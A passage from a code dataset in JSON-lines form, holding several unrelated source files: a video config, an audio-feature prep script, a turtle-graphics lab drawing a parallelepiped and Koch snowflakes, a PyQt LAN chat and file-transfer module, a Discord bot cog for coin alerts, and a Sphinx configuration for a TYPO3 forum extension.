frames\r\n\r\nstart = 0 # start point (in seconds) of a video, set to 0 if not specified\r\nend = 60 # end point (in seconds) of a video, set to 0 if not specified\r\n\r\nvideo_resolution = (1920, 1080) # resolution of a input video\r\npygame_resolution = (960, 540) # resolution of a visualization in pygame\r\nfps = 60 # fps of a video\r\n\r\nconfidence = 0.45 # confidence in searchng for a cursor\r\nmax_limit = 50 # maximum amount of pixel distance from a previous location","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"102770318","text":"X, Y = [], []\nfor y, cmd in enumerate(list_cmd):\n folder = 'dataset/%s/' % cmd\n for filename in os.listdir(folder):\n sr, signal = wavfile.read(folder + filename)\n signal = np.pad(signal,\n (0, 16000 - signal.shape[0]), \n 'constant', \n constant_values=(0, 0))\n assert signal.shape[0] == 16000\n X.append(preprocess.get_feature(signal))\n Y.append(y)\nX = np.array(X)\nY = np.array(Y)\nnp.save('dataset/X.npy', X)\nnp.save('dataset/Y.npy', Y)","sub_path":"py/archive/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"111063752","text":"import turtle\r\nfrom random import random, randrange\r\nimport numpy as np\r\nimport math as mt\r\n\r\n# координати паралелепіпеда\r\nxw=600\r\nyw=600\r\nst=300\r\n# розташування координат у строках: дальній чотирикутник - A B I M, ближній чотирикутник D C F E\r\nPrlpd = np.array([[0, 0, 0, 1],\r\n [st, 0, 0, 1],\r\n [st, st, 0, 1],\r\n [0, st, 0, 1],\r\n [0, 0, st, 1],\r\n [st, 0, st, 1],\r\n [st, st, st, 1],\r\n [0, st, st, 1]])\r\n# функция проекції на xy, z=0\r\ndef ProjectXY(Figure):\r\n f = np.array([ [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 0], [0, 0, 0, 1] ]) # по строках\r\n ft=f.T\r\n Prxy = Figure.dot(ft)\r\n return Prxy\r\n# зміщення\r\ndef ShiftXYZ(Figure, l, m, n):\r\n f = np.array([[1, 0, 0, l],\r\n [0, 1, 0, m],\r\n [0, 0, 1, n],\r\n [1, 0, 0, 1]]) # по строках\r\n ft=f.T\r\n Prxy = Figure.dot(ft)\r\n return Prxy\r\n# обертання коло х\r\ndef insertX(Figure, TetaG):\r\n TetaR=(3/14*TetaG)/180\r\n f = np.array([[1, 0, 0, 0],\r\n [0, mt.cos(TetaR), mt.sin(TetaR), 0],\r\n [0, -mt.sin(TetaR), mt.cos(TetaR), 0],\r\n [0, 0, 0, 1]])\r\n ft=f.T\r\n Prxy = Figure.dot(ft)\r\n return Prxy\r\n# аксонометрія\r\ndef dimetri(Figure, TetaG1, TetaG2):\r\n TetaR1=(3/14*TetaG1)/180\r\n TetaR2=(3/14*TetaG2)/180\r\n f1 = np.array([[mt.cos(TetaR1), 0 , -mt.sin(TetaR1), 0],\r\n [0, 1, 0, 0],\r\n [mt.sin(TetaR1), 0, mt.cos(TetaR1), 1],\r\n [0, 0, 0, 0],])\r\n ft1 = f1.T\r\n Prxy1 = Figure.dot(ft1)\r\n f2 = np.array([[1, 0, 0, 0],\r\n [0, mt.cos(TetaR2), mt.sin(TetaR2), 0],\r\n [0, -mt.sin(TetaR2), mt.cos(TetaR2), 0],\r\n [0, 0, 0, 1]])\r\n ft2=f2.T\r\n Prxy2 = Prxy1.dot(ft2)\r\n return Prxy2\r\n\r\n\r\n# функція побудови растрового паралелепіпеда\r\ndef PrlpdWiz(Prxy3):\r\n # дальня грань - (в проекції ліва)\r\n Ax1 = Prxy3[0, 0]\r\n Ay1 = Prxy3[0, 1]\r\n Bx1 = Prxy3[1, 0]\r\n By1 = Prxy3[1, 1]\r\n Ix1 = Prxy3[2, 0]\r\n Iy1 = Prxy3[2, 1]\r\n Mx1 = Prxy3[3, 0]\r\n My1 = Prxy3[3, 1]\r\n # ближня грань - (в проекції права)\r\n Dx1 = Prxy3[4, 0]\r\n Dy1 = Prxy3[4, 1]\r\n Cx1 = Prxy3[5, 0]\r\n Cy1 = Prxy3[5, 1]\r\n Fx1 = Prxy3[6, 0]\r\n Fy1 = Prxy3[6, 1]\r\n Ex1 = Prxy3[7, 0]\r\n Ey1 = Prxy3[7, 1]\r\n\r\n # дальня грань - (в проекції ліва)\r\n turtle.up()\r\n turtle.goto(Ax1, Ay1)\r\n turtle.down()\r\n turtle.goto(Bx1, By1)\r\n turtle.goto(Ix1, Iy1)\r\n turtle.goto(Mx1, My1)\r\n turtle.goto(Ax1, Ay1)\r\n\r\n # ближча грань - (в проекції права)\r\n turtle.up()\r\n turtle.goto(Dx1, Dy1)\r\n turtle.down()\r\n turtle.goto(Cx1, Cy1)\r\n turtle.goto(Fx1, Fy1)\r\n turtle.goto(Ex1, Ey1)\r\n turtle.goto(Dx1, Dy1)\r\n\r\n # верхеня грань - (в проекції верхня)\r\n\r\n turtle.up()\r\n turtle.goto(Ax1, Ay1)\r\n turtle.down()\r\n turtle.goto(Bx1, By1)\r\n turtle.goto(Cx1, Cy1)\r\n turtle.goto(Dx1, Dy1)\r\n turtle.goto(Ax1, Ay1)\r\n\r\n # верхеня грань - (в проекції верхня)\r\n turtle.up()\r\n turtle.goto(Mx1, My1)\r\n turtle.down()\r\n turtle.goto(Ix1, Iy1)\r\n turtle.goto(Fx1, Fy1)\r\n turtle.goto(Ex1, Ey1)\r\n turtle.goto(Mx1, My1)\r\n\r\n # ліва грань - (в проекції ближня)\r\n turtle.up()\r\n turtle.goto(Ax1, Ay1)\r\n turtle.down()\r\n turtle.goto(Mx1, My1)\r\n turtle.goto(Ex1, Ey1)\r\n turtle.goto(Dx1, Dy1)\r\n turtle.goto(Ax1, Ay1)\r\n\r\n # права грань - (в проекції дальня)\r\n turtle.up()\r\n turtle.goto(Bx1, By1)\r\n turtle.down()\r\n turtle.goto(Ix1, Iy1)\r\n turtle.goto(Fx1, Fy1)\r\n turtle.goto(Cx1, Cy1)\r\n turtle.goto(Bx1, By1)\r\n\r\n return PrlpdWiz\r\n\r\n\r\n\r\nsize = 300; n = 2;\r\ndef koch_curve(size, n):\r\n if n == 0:\r\n turtle.forward(size)\r\n else:\r\n koch_curve(size / 3, n - 1)\r\n turtle.left(60)\r\n koch_curve(size / 3, n - 1)\r\n turtle.right(120)\r\n koch_curve(size / 3, n - 1)\r\n turtle.left(60)\r\n koch_curve(size / 3, n - 1)\r\n\r\ndef draw_koch_snowflake(size, n):\r\n for i in range(3):\r\n koch_curve(size, n)\r\n turtle.right(120)\r\n\r\ndraw_koch_snowflake(size, n)\r\n# --------------- багатократний фрактал КОХА (сніжинка) - як форма черепашки ---------\r\ndef koch_curve(turtle, steps, length):\r\n if steps == 0:\r\n turtle.forward(length)\r\n else:\r\n for angle in [60, -120, 60, 0]:\r\n koch_curve(turtle, steps - 1, length / 3)\r\n turtle.left(angle)\r\n\r\ndef koch_snowflake(turtle, steps, length):\r\n turtle.begin_poly()\r\n\r\n for _ in range(3):\r\n koch_curve(turtle, steps, length)\r\n turtle.right(120)\r\n\r\n turtle.end_poly()\r\n\r\n return turtle.get_poly()\r\n# ------------------------------ зміна характеристик черепахи ---------------------\r\nturtle.speed(\"fastest\")\r\nturtle.register_shape(\"snowflake\", koch_snowflake(turtle.getturtle(), 2, 100))\r\nturtle.reset()\r\nturtle.penup()\r\nturtle.shape(\"snowflake\")\r\n\r\nwidth, height = turtle.window_width() / 2, turtle.window_height() / 2\r\nwidth=int(width)\r\nheight =int(height)\r\nfor _ in range(7):\r\n turtle.color((random(), random(), random()), (random(), random(), random()))\r\n turtle.goto(randrange(-width, width), randrange(-height, height))\r\n turtle.stamp()\r\n\r\n# ------------------------------ зміна характеристик черепахи ---------------------\r\nturtle.shape(\"triangle\")\r\nturtle.stamp()\r\nturtle.forward(1)\r\n\r\n\r\nxw=600; yw=600; st=50; TetaG1=180; TetaG2=-90\r\nl=(xw/2)-st; m=(yw/2)-st; n=m\r\n#Prlpd1=ShiftXYZ (Prlpd, l, m, n)\r\nPrlpd2=dimetri (Prlpd, TetaG1, TetaG2)\r\nPrxy3=ProjectXY (Prlpd2)\r\nPrlpdWiz(Prxy3)\r\nturtle.screen.exitonclick()\r\nturtle.screen.mainloop()\r\n#--------------------------------------------------------------------------------------\r\n","sub_path":"Labaratorywork6/Koh.py","file_name":"Koh.py","file_ext":"py","file_size_in_byte":6288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42324157","text":"import os\nimport json\nfrom signals import S\nfrom PyQt4 import QtCore, QtNetwork\n\n#in milliseconds\nREAD_TIMEOUT=10000\nCONNECTION_TIMEOUT=10000\n\nBROADCAST_INTERVAL=1000\nSCAN_INTERVAL=3000\n\n#in bytes\nPACKET_SIZE=1024\n\n# FIXED TCP PORT\nTCP_PORT=13373\n# FIXED UDP PORT\nUDP_PORT=13373\n\nKEY='HailHydra'\n\nclass NetworkInterface():\n \"\"\" Generic class for network connections \"\"\"\n def __init__(self):\n self.connection = None\n\n S.SEND_MSG.connect(self.sendMsg)\n S.SEND_FILE.connect(self.sendFile)\n\n def readData(self):\n instream = QtCore.QDataStream(self.connection)\n instream.setVersion(QtCore.QDataStream.Qt_4_0)\n\n if self.connection.bytesAvailable() < 4:\n return\n\n # Reading blocksize\n blockSize = instream.readUInt32()\n\n # Checking if the inputstream matches the blocksize\n if self.connection.bytesAvailable() < blockSize:\n return\n\n # Detecting the data type\n header_bytes = instream.readString()\n header = json.loads(str(header_bytes, encoding='utf-8'))\n\n if(header['TYPE']=='MSG'):\n S.MSG_RECV.emit(header)\n\n elif(header['TYPE']=='FILE'):\n actual_bytes=header['SIZE']\n recv_bytes=0\n\n # Storing file in default location\n new_path = QtCore.QDir.homePath() + '/LanChat/'\n if not QtCore.QDir(new_path).exists():\n QtCore.QDir(QtCore.QDir.homePath()).mkdir('LanChat')\n\n S.FILE_INIT.emit(header)\n\n file=open(new_path+header['NAME'],\"wb\")\n\n self.connection.waitForReadyRead(-1)\n\n # Writing raw bytes to file\n while(True):\n S.PROGRESS_UPD.emit('DOWNLOAD', (recv_bytes/actual_bytes)*100)\n\n bytes_remain=self.connection.bytesAvailable()\n if (bytes_remain==0):\n break\n\n recv_bytes=recv_bytes+bytes_remain\n content=instream.readRawData(bytes_remain)\n file.write(content)\n\n if(recv_bytes==actual_bytes):\n break\n\n self.connection.waitForReadyRead(READ_TIMEOUT)\n\n file.close()\n if(actual_bytes==recv_bytes):\n S.PROGRESS_UPD.emit('DOWNLOAD', 100)\n\n header['PATH']=new_path\n S.FILE_RECV.emit(header)\n else:\n print('Error occured')\n\n def sendMsg(self,msg):\n if (msg==''):\n return\n\n # Array of bytes to hold the data\n block = QtCore.QByteArray()\n\n # Datastream\n outstream = QtCore.QDataStream(block, QtCore.QIODevice.WriteOnly)\n outstream.setVersion(QtCore.QDataStream.Qt_4_0)\n\n # Inserting space to write the block size\n outstream.writeUInt32(0)\n\n # Message\n header={'TYPE':'MSG','MSG':msg}\n header_bytes=bytes(json.dumps(header),encoding='utf-8')\n outstream.writeString(header_bytes)\n\n # Writing block size at the beginning of stream\n outstream.device().seek(0)\n outstream.writeUInt32(block.size() - 4)\n\n # Writing data to socket\n self.connection.write(block)\n\n def sendFile(self, filepath):\n if (filepath==''):\n return\n\n S.PROGRESS_UPD.emit('UPLOAD', 0)\n\n # Array of bytes to hold the data\n block = QtCore.QByteArray()\n\n # Datastream\n outstream = QtCore.QDataStream(block, QtCore.QIODevice.WriteOnly)\n outstream.setVersion(QtCore.QDataStream.Qt_4_0)\n\n # Inserting space to write the block size\n outstream.writeUInt32(0)\n\n # Header for file\n filename = os.path.split(filepath)[-1]\n\n actual_bytes=os.path.getsize(filepath)\n send_bytes=0\n\n header={'TYPE':'FILE',\n 'NAME':filename,\n 'SIZE':actual_bytes}\n\n header_bytes=bytes(json.dumps(header),encoding='utf-8')\n outstream.writeString(header_bytes)\n\n outstream.device().seek(0)\n outstream.writeUInt32(block.size() - 4)\n\n # Writing header for file\n self.connection.write(block)\n\n # Raw bytes of the file\n f = open(filepath, \"rb\")\n try:\n byte = f.read(PACKET_SIZE)\n while byte != b'':\n S.PROGRESS_UPD.emit('UPLOAD', (send_bytes/actual_bytes)*100)\n\n block.clear()\n outstream.device().seek(0)\n outstream.writeRawData(byte)\n\n self.connection.waitForBytesWritten(-1)\n self.connection.write(block)\n\n byte = f.read(PACKET_SIZE)\n send_bytes=send_bytes+PACKET_SIZE\n finally:\n f.close()\n\n S.PROGRESS_UPD.emit('UPLOAD', 100)\n S.FILE_SENT.emit()\n\nclass Server(NetworkInterface):\n \"\"\" Class definition for the TCP server \"\"\"\n def __init__(self):\n NetworkInterface.__init__(self)\n\n self.tcpServer = QtNetwork.QTcpServer()\n self.udpSocket= QtNetwork.QUdpSocket()\n\n self.timer = QtCore.QTimer()\n\n # Send a perodic broadcast for discovery\n def broadcast(self):\n self.timer.start(BROADCAST_INTERVAL)\n self.timer.timeout.connect(self.sendDatagram)\n\n # Datagram to send\n def sendDatagram(self):\n # Code for broadcasting in network\n self.udpSocket.writeDatagram(KEY,QtNetwork.QHostAddress(QtNetwork.QHostAddress.Broadcast),UDP_PORT)\n\n # Waiting for a TCP connection\n def listen(self):\n # Listening to a specific port\n if not self.tcpServer.listen(port=TCP_PORT):\n print('Error occured')\n\n # Function is called when new connection is available\n self.tcpServer.newConnection.connect(self.newconnection)\n\n def newconnection(self):\n if(self.connection):\n return\n\n # Stops the UPD broadcast\n self.timer.stop()\n\n # Saves the socket connection\n self.connection = self.tcpServer.nextPendingConnection()\n\n # Remote terminal ipaddress\n peerAddress = self.connection.peerAddress().toString()\n\n S.DEVICE_CONNECTED.emit(peerAddress)\n\n # Codes to execute when connection is dropped\n self.connection.disconnected.connect(self.close)\n self.connection.disconnected.connect(S.DISCONNECTED.emit)\n\n # Function to run when data to read is available\n self.connection.readyRead.connect(self.readData)\n\n # Closes socket and server if disconnected\n def close(self):\n if (self.connection):\n self.connection.close()\n self.connection=None\n self.tcpServer.close()\n\nclass Client(NetworkInterface):\n \"\"\" Class definition for TCP client \"\"\"\n def __init__(self):\n NetworkInterface.__init__(self)\n\n self.connection = QtNetwork.QTcpSocket()\n self.udpSocket = QtNetwork.QUdpSocket()\n\n self.hostlist = []\n\n self.timer1 = QtCore.QTimer()\n\n def findHosts(self):\n self.udpSocket.bind(UDP_PORT)\n self.udpSocket.readyRead.connect(self.recvDatagram)\n\n # Timer to emit hostlist\n self.timer1.start(SCAN_INTERVAL)\n self.timer1.timeout.connect(self.emitHosts)\n\n S.CONNECT_HOST.connect(self.connect)\n\n def recvDatagram(self):\n while self.udpSocket.hasPendingDatagrams():\n datagram, host, port = self.udpSocket.readDatagram(self.udpSocket.pendingDatagramSize())\n key=str(datagram, encoding='ascii')\n strHost=host.toString()\n if(key==KEY):\n if(strHost not in self.hostlist):\n self.hostlist.append(strHost)\n\n def emitHosts(self):\n # Sending a copy of list\n S.HOST_LIST.emit(self.hostlist.copy())\n self.hostlist.clear()\n\n def connect(self, host):\n self.timer1.stop()\n\n self.connection.connectToHost(host, TCP_PORT)\n\n # Code to run when connection is established\n if(self.connection.waitForConnected(CONNECTION_TIMEOUT)):\n S.DEVICE_CONNECTED.emit(host)\n\n # Function to run when data to read is available\n self.connection.readyRead.connect(self.readData)\n\n # Codes to execute when connection is dropped\n self.connection.disconnected.connect(self.close)\n self.connection.disconnected.connect(S.DISCONNECTED.emit)\n\n # Code to run when connection timeout\n else:\n self.close()\n S.NO_CONNECTION.emit()\n\n # Closes socket if disconnected\n def close(self):\n self.connection.close()\n\nclass NetworkThread(QtCore.QThread):\n \"\"\"Defining a thread to be used for networking\"\"\"\n def __init__(self):\n QtCore.QThread.__init__(self)\n \n self.running = False\n self.mode = None\n \n # Runs in main thread \n def startThread(self,mode):\n self.mode = mode\n self.start() \n \n # Runs in seperate thread \n def run(self):\n # Network objects are created within this thread only\n self.running = True\n\n if (self.mode == 'CLIENT'):\n client = Client()\n\n # Finds hosts in the network\n client.findHosts()\n\n elif(self.mode == 'SERVER'):\n server = Server()\n\n # Broadcast datagram to everyone\n server.broadcast()\n\n # Listen for incoming TCP connection\n server.listen()\n\n # Event loop to prevent thread from terminating\n self.exec_()\n\n def quit(self):\n self.running = False\n QtCore.QThread.quit(self)\n\nif __name__ == '__main__':\n print('Nothing to run')\nelse:\n networkThread = NetworkThread()\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":9673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"408279814","text":"import json\nimport sys\nimport traceback\nimport asyncio\nimport datetime\nimport discord\nfrom discord.ext import commands\n\nimport data\nimport rally_api\nimport validation\nimport errors\nimport aiohttp\n\nfrom cogs import update_cog\n\nfrom constants import *\nfrom utils import pretty_print\nfrom utils.converters import TimeframeType\n\n\nclass DefaultsCommands(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n async def cog_after_invoke(self, ctx):\n await pretty_print(\n ctx, \"Command completed successfully!\", title=\"Success\", color=SUCCESS_COLOR\n )\n\n @errors.standard_error_handler\n async def cog_command_error(self, ctx, error):\n # All other Errors not returned come here. And we can just print the default TraceBack.\n print(\"Ignoring exception in command {}:\".format(ctx.command), file=sys.stderr)\n traceback.print_exception(\n type(error), error, error.__traceback__, file=sys.stderr\n )\n\n @staticmethod\n async def update_setting(ctx, alert, alert_nr, value, setting):\n # check if settings have been configured on the dashboard\n settings = data.get_alerts_settings(ctx.guild.id)\n if not settings:\n return await pretty_print(ctx, \"Alert settings have not been configured on the dashboard\", title='Error', color=ERROR_COLOR)\n\n settings = settings[ALERTS_SETTINGS_KEY]\n\n # check if given alert is valid\n if alert not in settings:\n return await pretty_print(ctx, \"Invalid \", title='Error', color=ERROR_COLOR)\n\n channel_object = None\n instance = None\n # check if alert_nr is a digit and check if its valid\n if alert_nr.isdigit():\n if int(alert_nr) > len(settings[alert]['instances']) or int(alert_nr) < 0:\n return await pretty_print(ctx, \"Couldn't find an entry by that alert number\", title='Error', color=ERROR_COLOR)\n\n instance = settings[alert]['instances'][int(alert_nr) - 1]\n channel_object = discord.utils.get(ctx.guild.channels, name=instance['channel'])\n\n # check if alert_nr was valid and instance and channel_object were set\n if not channel_object or not instance:\n return await pretty_print(ctx, \"Invalid \", title='Error', color=ERROR_COLOR)\n\n # update settings\n instance['settings'][setting] = value\n data.set_alerts_settings(ctx.guild.id, json.dumps(settings))\n\n return await pretty_print(ctx, \"Alert settings have been updated\", title='Success', color=SUCCESS_COLOR)\n\n @commands.command(\n name='setmin',\n help=' - Set the minimum amount for an alert'\n )\n @commands.guild_only()\n async def setmin(self, ctx, alert, alert_nr, value):\n return await self.update_setting(ctx, alert, alert_nr, value, 'minamount')\n\n @commands.command(\n name='setmax',\n help=' - Set the minimum amount for an alert'\n )\n @commands.guild_only()\n async def setmax(self, ctx, alert, alert_nr, value):\n return await self.update_setting(ctx, alert, alert_nr, value, 'maxamount')\n\n @commands.command(\n name='settimezone',\n help=' - Set timezone setting for daily stats message'\n )\n @commands.guild_only()\n async def settimezone(self, ctx, alert_nr, value):\n return await self.update_setting(ctx, 'daily_stats', alert_nr, value, 'timezone')\n\n @commands.command(\n name='allcoinstats',\n help=' - (day/week) list the following stats in the coin alerts channel based on the time given'\n )\n @commands.guild_only()\n async def allcoinstats(self, ctx, timeframe: TimeframeType):\n # delete week old data\n data.delete_week_old_events()\n\n # if default coin isn't set, send info to user about how to set it\n default_coin = data.get_default_coin(ctx.guild.id)\n if not default_coin:\n return await pretty_print(\n ctx, \"A default coin has not been set. An admin can set the default coin by typing $setdefaultcoin . Type $help for more information.\", title=\"Error\", color=ERROR_COLOR\n )\n\n # get statistics\n if timeframe == 'day':\n coin_stats = update_cog.get_day_stats(default_coin)\n else:\n coin_stats = update_cog.get_week_stats(default_coin)\n\n rewards = rally_api.get_coin_rewards(default_coin)\n coin_image_url = rally_api.get_coin_image_url(default_coin)\n\n # format message, done through dict to make keeping this and daily_stats message similar easier\n extra_str = 'Today' if timeframe == 'day' else 'This Week'\n reward_str = 'last24HourEarned' if timeframe == 'day' else 'weeklyAccumulatedReward'\n message = {\n \"description\": f\"```xl\\n\"\n f\"- {extra_str}`s purchases: {len(coin_stats['buy'])}\\n\\n\"\n f\"- {extra_str}`s donations: {len(coin_stats['donate'])}\\n\\n\"\n f\"- {extra_str}`s transfers: {len(coin_stats['transfer'])}\\n\\n\"\n f\"- {extra_str}`s conversions: {len(coin_stats['convert'])}\\n\\n\"\n f\"- {extra_str}`s redeems: {len(coin_stats['redeem'])}\\n\\n\"\n f\"- {extra_str}`s rewards earned: {round(rewards[reward_str], 3)}\\n\"\n f\"```\",\n \"color\": 0xff0000,\n \"author\": {\n \"name\": f\"{default_coin} Stats {extra_str}\",\n \"icon_url\": coin_image_url\n },\n \"timestamp\": datetime.datetime.now().isoformat()\n }\n\n # send message\n embed = discord.Embed.from_dict(message)\n return await ctx.send(embed=embed)\n\n @commands.command(\n name=\"set_default_coin\",\n help=\" Set a default coin to be used across the server\",\n )\n @validation.owner_or_permissions(administrator=True)\n async def set_default_coin(self, ctx, coin_name):\n await pretty_print(\n ctx,\n f\"Are you sure you want to set {coin_name} as default coin?\",\n caption=\"Give 👍 reaction to confirm\",\n title=\"Warning\",\n color=WARNING_COLOR,\n )\n\n def check(reaction, user):\n return user == ctx.message.author and str(reaction.emoji) == \"👍\"\n\n try:\n await self.bot.wait_for(\"reaction_add\", timeout=30.0, check=check)\n except asyncio.TimeoutError:\n await pretty_print(\n ctx, \"Set default coin timed out 👎\", title=\"Timeout\", color=ERROR_COLOR\n )\n else:\n data.add_default_coin(ctx.guild.id, coin_name)\n await pretty_print(\n ctx,\n f\"{coin_name} is now the default coin 👍\",\n title=\"Set\",\n color=GREEN_COLOR,\n )\n\n @commands.command(\n name=\"change_prefix\",\n help=\" Prefix for bot commands\",\n )\n @validation.owner_or_permissions(administrator=True)\n async def set_prefix(self, ctx, prefix):\n data.add_prefix_mapping(ctx.guild.id, prefix)\n\n @commands.command(\n name=\"change_bot_name\",\n help=\"Change the bot's name on this server\"\n )\n @commands.is_owner()\n async def set_bot_name(self, ctx, *, name=\"\"):\n try:\n await self.bot.user.edit(username=name)\n data.set_bot_name(ctx.guild.id, name)\n except Exception as e:\n return await ctx.send(f'Error: {e.text.split(\":\")[-1]}')\n\n @commands.command(\n name=\"change_bot_avatar\",\n help=\"Changes the bot's avatar\"\n )\n @commands.is_owner()\n async def set_bot_avatar(self, ctx, url=None):\n if url is None:\n url = DEFAULT_BOT_AVATAR_URL\n\n try:\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n avatar = await response.read()\n\n await self.bot.user.edit(avatar=avatar)\n data.set_bot_avatar(ctx.guild.id, url)\n except:\n return await ctx.send('Error setting new bot avatar')\n\n @commands.command(\n name=\"role_call\",\n help=\" Display users who have access to a given role\",\n )\n @validation.owner_or_permissions(administrator=True)\n async def role_call(self, ctx, role: discord.Role):\n usersStr = \"\"\n for member in ctx.guild.members:\n if role in member.roles:\n usersStr += f\"{member}\\n\"\n await pretty_print(\n ctx,\n usersStr,\n title=f\"Users with {role} role\",\n color=GREEN_COLOR,\n )\n\n @commands.command(\n name=\"list_all_users\",\n help=\"Display users who have been registered\",\n )\n @validation.owner_or_permissions(administrator=True)\n async def list_all_users(self, ctx):\n usersStr = \"\"\n registered_users = data.get_all_users()\n for user in registered_users:\n member = await ctx.guild.fetch_member(user[DISCORD_ID_KEY])\n if member:\n usersStr += f\"{member}\\nRallyId: {user[RALLY_ID_KEY]}\\nDiscordId: {user[DISCORD_ID_KEY]}\\n\\n\"\n await pretty_print(\n ctx,\n usersStr or \"No registered users on this server\",\n title=f\"All registered users\",\n color=GREEN_COLOR,\n )\n","sub_path":"rallyrolebot/cogs/defaults_cog.py","file_name":"defaults_cog.py","file_ext":"py","file_size_in_byte":9503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"525618023","text":"# -*- coding: utf-8 -*-\n#\n\nimport sys\nimport os\n\n# -- PHP highlighting configuration --------------------------------------------\n\nfrom sphinx.highlighting import lexers\nif lexers:\n\tfrom pygments.lexers.web import PhpLexer\n\tlexers['php'] = PhpLexer(startinline=True)\n\n# -- General configuration -----------------------------------------------------\n\nextensions = ['sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.ifconfig']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = u'typo3forum'\ncopyright = u'2016, Mittwald CM Service'\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nversion = '1.0'\n# The full version, including alpha/beta/rc tags.\nrelease = '1.0.0'\n\n# Else, today_fmt is used as the format for a strftime call.\ntoday_fmt = '%Y-%m-%d %H:%M'\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = ['_make']\nexclude_trees = ['_make']\n\n# If true, sectionauthor and moduleauthor directives will be shown in the\n# output. They are ignored by default.\nshow_authors = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n# -- Options for HTML output ----------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\nhtml_theme = 'default'\n\n# Add any paths that contain custom themes here, relative to this directory.\nhtml_theme_path = []\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = ['../Images']\n\n# If true, \"Created using Sphinx\" is shown in the HTML footer. Default is True.\nhtml_show_sphinx = False\n\n# If true, \"(C) Copyright ...\" is shown in the HTML footer. Default is True.\nhtml_show_copyright = False\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'typo3_forum'\n\n\n# -- Options for LaTeX output --------------------------------------------------\n\nlatex_elements = {\n\n# The font size ('10pt', '11pt' or '12pt').\n#'pointsize': '10pt',\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title,\n# author, documentclass [howto, manual, or own class]).\nlatex_documents = [\n ('index', 'typo3_forum.tex', u'typo3\\_forum',\n u'Mittwald CM Service', 'manual'),\n]\n\n# -- Options for rst2pdf output ------------------------------------------------\n\n# The options element is a dictionary that lets you override\n# this config per-document.\n# For example,\n# ('index', u'MyProject', u'My Project', u'Author Name',\n# dict(pdf_compressed = True))\n# would mean that specific document would be compressed\n# regardless of the global pdf_compressed setting.\npdf_documents = [\n ('index', 'typo3_forum', u'typo3\\_forum',\n u'Mittwald CM Service', 'manual'),\n]\n\n# A comma-separated list of custom stylesheets. Example:\npdf_stylesheets = ['sphinx','kerning','a4']\n\n# A list of folders to search for stylesheets. Example:\npdf_style_path = ['.', '_styles']\n\n# How many levels deep should the table of contents be?\npdf_toc_depth = 9999\n\n# Add section number to section references\npdf_use_numbered_links = False\n\n# Background images fitting mode\npdf_fit_background_mode = 'scale'\n\n\n# -- Options for manual page output ---------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n ('index', 'typo3_forum', u'typo3_forum',\n [u'Mittwald CM Service'], 1)\n]\n\n# If true, show URL addresses after external links.\n#man_show_urls = False\n\n# -- Options for Texinfo output -------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [\n ('index', 'typo3_forum', u'typo3_forum',\n u'Mittwald CM Service', 'typo3_forum', ' forum plugin for TYPO3',\n 'Miscellaneous'),\n]\n\n#=================================================\n#\n# TYPO3 codeblock BEGIN:\n#\n# Insert this codeblock at the end of your Sphinx\n# builder configuration file 'conf.py'.\n# This may enable TYPO3 specific features like\n# TYPO3 themes. It makes Yaml settings files work.\n#\n#-------------------------------------------------\n\nif 1 and \"TYPO3 specific\":\n\n try:\n t3DocTeam\n except NameError:\n t3DocTeam = {}\n\n try:\n import t3sphinx\n html_theme_path.insert(0, t3sphinx.themes_dir)\n html_theme = 'typo3sphinx'\n except:\n html_theme = 'default'\n\n t3DocTeam['conf_py_file'] = None\n try:\n t3DocTeam['conf_py_file'] = __file__\n except:\n import inspect\n t3DocTeam['conf_py_file'] = inspect.getfile(\n inspect.currentframe())\n\n t3DocTeam['conf_py_package_dir'] = os.path.abspath(os.path.dirname(\n t3DocTeam['conf_py_file']))\n t3DocTeam['relpath_to_master_doc'] = '..'\n t3DocTeam['relpath_to_logdir'] = '_not_versioned'\n t3DocTeam['path_to_logdir'] = os.path.join(\n t3DocTeam['conf_py_package_dir'],\n t3DocTeam['relpath_to_logdir'])\n t3DocTeam['pathToYamlSettings'] = os.path.join(\n t3DocTeam['conf_py_package_dir'],\n t3DocTeam['relpath_to_master_doc'], 'Settings.yml')\n try:\n t3DocTeam['pathToGlobalYamlSettings'] = \\\n t3sphinx.pathToGlobalYamlSettings\n except:\n t3DocTeam['pathToGlobalYamlSettings'] = None\n if not t3DocTeam['pathToGlobalYamlSettings']:\n t3DocTeam['pathToGlobalYamlSettings'] = os.path.join(\n t3DocTeam['conf_py_package_dir'], 'GlobalSettings.yml')\n try:\n __function = t3sphinx.yamlsettings.processYamlSettings\n except:\n __function = None\n if not __function:\n try:\n import yamlsettings\n __function = yamlsettings.processYamlSettings\n except:\n __function = None\n if __function:\n __function(globals(), t3DocTeam)\n\n#-------------------------------------------------\n#\n# TYPO3 codeblock 